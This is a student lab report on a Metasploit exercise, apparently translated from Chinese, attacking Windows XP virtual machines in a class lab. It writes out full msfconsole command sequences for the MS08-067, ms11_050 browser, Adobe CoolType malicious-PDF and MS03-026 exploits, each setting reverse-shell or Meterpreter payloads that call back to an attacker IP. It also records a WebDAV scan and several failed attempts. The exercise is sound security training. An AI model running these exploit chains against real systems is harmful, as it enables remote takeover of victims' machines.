Experimental content
The goal of this practice is to master the basic application methods of metasploit, focusing on the ideas of three commonly used attack methods. Specifically need to complete:
An active attack practice, such as MS08-067;
An attack against browsers, such as ms11-050;
A client-side attack, such as Adobe;
Successfully applied any of the auxiliary modules.
The above four small practices are not limited to the above examples, and at least one of them is required to be different from all other students.
Active Attack Practice MS08-067 Vulnerability
msfconsole
enter msf consolesearch ms08_067
Check out this vulnerability
use exploit/windows/smb/ms08_067_netapi
use this exploitshow payloads
Backlink attack payloadset payload generic/shell_reverse_tcp
tcp reverse connectionset LHOST 192.168.126.128
Attacker's ip addressset LPORT 5229
attack portset RHOST 192.168.126.136
The ip address of the target machineset target 0
Select target system typeexploit
attackThe following figure shows the successful attack
ipconfig
Enter the ip address of the target machine in kali
- Check the ip address of the target machine in XP, the two are exactly the same.
Browser Attacks ms11_050
enter the
msfconsole
consoleEnter
use windows/browser/ms11_050_mshtml_cobjectelement
the command to use the ms11_050 vulnerabilityEnter
set payload windows/meterpreter/reverse_http
the command to use http reverse connection- Set the IP address of kali
set LHOST 192.168.126.128
- set port
set LPORT 5229
- set resource identifier path
set URIPATH fyh5229
attack
exploit
Enter the URL of the LOCAL IP in the above picture into the IE browser in WIN XP, and 遇到问题需要关闭
the window that appears. At the same time, 360 has given a notice that it needs to be repaired.
But back to KALI to establish a session, IE browser has closed the page.
I set the browser's options, set the security level to the lowest level, and enabled the plug-in settings, but the session connection still failed. . .
will look into this
Client-Side Attack Adobe
- Enter
msfconsole
into the msf console Enter to
search adobe
find vulnerabilities related to adobeI chose
windows/fileformat/adobe_cooltype_sing
Enter
set payload windows/meterpreter/reverse_tcp
the reverse connection using tcp- Set IP address and port number
- Enter
set FILENAME 5229.pdf
command to generate pdf file attack
- The figure below shows the sign of successfully generating a PDF file.
- According to the storage path, find the PDF file and put it into the target machine.
- But I couldn't find the file after searching for a long time. Later, as shown in the figure below, select
显示隐藏文件
it, and then I can find the hidden folder.
- I first copied the modified file into my host, and it was immediately deleted by 360.
- enter monitor mode in msf
set payload windows/meterpreter/reverse_tcp
tcp reverse connection- set ip address and port number
- attack
- Open the 5229.pdf file on XP, and the attack is successful in kali
- Enter ipconfig, the ip address of xp is displayed, which proves that the attack is correct.
Auxiliary module webdav
webdav: WebDAV is a communication protocol based on the HTTP 1.1 protocol. Because WebDAV is integrated with Windows XP and IIS, it has the security features provided by both. These include IIS permissions specified in the Internet Information Services snap-in and discretionary access control lists (DACLs) in the NTFS file system.
- enter msf console
- Use the
show auxiliary
command to display all auxiliary modules and their purpose.
- choose
scanner/http/webdav_scanner
show options
View configuration options for this vulnerability
- The ip address and thread of kali are set
- attack
- The result of the attack is shown in the figure above, but the target machine does not have IIS installed.
- Refer to how to enable IIS to install IIS on Windows XP system
- Allow
webdav
, attack again, will get[*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLED
the message.
RPC interface long hostname remote buffer overflow vulnerability (MS03-026)
Remote Procedure Call (RPC) is a remote procedure call protocol used by the Windows operating system. RPC provides an inter-process interactive communication mechanism that allows a program running on a computer to seamlessly execute code on a remote system.
- use
use exploit/windows/dcerpc/ms03_026_dcom
- use
set payload windows/meterpreter/reverse_tcp
tcp reverse connection show options View configuration options for this vulnerability
set LHOST 192.168.126.128 Set the host ip
set RHOST 192.168.126.137 Set the ip of the rebound shell
- The attack is successful, but there is no way to establish a session.
"无会话已创建"消息发生的情况:
① 使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,或目标配置有问题。
② 您使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。
According to the above prompts,
show options
the displayWindows NT SP3-6a/2000/XP/2003 Universal
can be used, and the virtual machine of its own is detected, and the virtual machine ofMicrosoft Windows XP Professional
theMicrosoft Windows XP Professional SP2
two versions cannot be used to establish a session.Checked the exploited vulnerabilities, no errors.
Because the vulnerability is related to the RPC protocol and remote, I opened the WindowsXP system security settings in the virtual machine respectively: turn off remote assistance and services (turn off the closed place) and what is the 'RPC server unavailable' displayed on XP Meaning but still unable to establish a session.
Well, I really can't solve this problem. . .
Post-experiment questions and answers
Explain what is exploit, payload, encode in your own words.
exploit
The English translation is利用
that hackers use loopholes to attack computers. There are loopholes that may not be exploited, but there must be loopholes that can be exploited.payload
:Payload. Usually when transmitting data, in order to make the data transmission more reliable, the original data should be transmitted in batches, and certain auxiliary information should be added to the head and tail of each batch of data, and the original data is the payload.encode
: Encoder, used to encode the payload to protect the payload from being discovered
Experiment summary and experience
This experiment is actually not difficult, but it does not mean that every attack can be successful, and it does not mean that every attack can successfully establish a session. I have done several experiments, and only a few of them succeeded, and I did not write down some of the failures.
Although most of them failed, there is no doubt that this experiment has learned a lot of knowledge by finding the loopholes in the data and learning by myself.